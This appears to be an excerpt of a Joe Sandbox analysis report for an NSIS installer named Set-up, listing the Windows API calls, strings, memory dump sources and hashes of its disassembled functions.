                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FilePointer
                                                                • String ID:
                                                                • API String ID: 973152223-0
                                                                • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                APIs
                                                                • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                APIs
                                                                • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CallbackDispatcherUser
                                                                • String ID:
                                                                • API String ID: 2492992576-0
                                                                • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                • DeleteObject.GDI32(?), ref: 00404A79
                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                • String ID: $ @$M$N
                                                                • API String ID: 1638840714-3479655940
                                                                • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                  • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                  • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                  • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                  • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                • String ID: 82D$@%F$@rD$A
                                                                • API String ID: 3347642858-1086125096
                                                                • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                • API String ID: 1916479912-1189179171
                                                                • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                APIs
                                                                • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                • FindClose.KERNEL32(?), ref: 00406E33
                                                                Strings
                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                • \*.*, xrefs: 00406D03
                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                • API String ID: 2035342205-3294556389
                                                                • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                APIs
                                                                • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                • API String ID: 3581403547-784952888
                                                                • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                APIs
                                                                • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                Strings
                                                                • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: CreateInstance
                                                                • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                • API String ID: 542301482-1377821865
                                                                • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                  • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                • API String ID: 20674999-2124804629
                                                                • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                APIs
                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                • GetSysColor.USER32(?), ref: 004041AF
                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                  • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                  • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                • SendMessageW.USER32(00000000), ref: 00404251
                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                • SetCursor.USER32(00000000), ref: 004042D2
                                                                • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                • SetCursor.USER32(00000000), ref: 004042F6
                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2230884701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2230864947.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230902191.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230919350.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2230989786.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                • String ID: @%F$N$open
                                                                • API String ID: 3928313111-3849437375
                                                                • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                APIs
                                                                • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
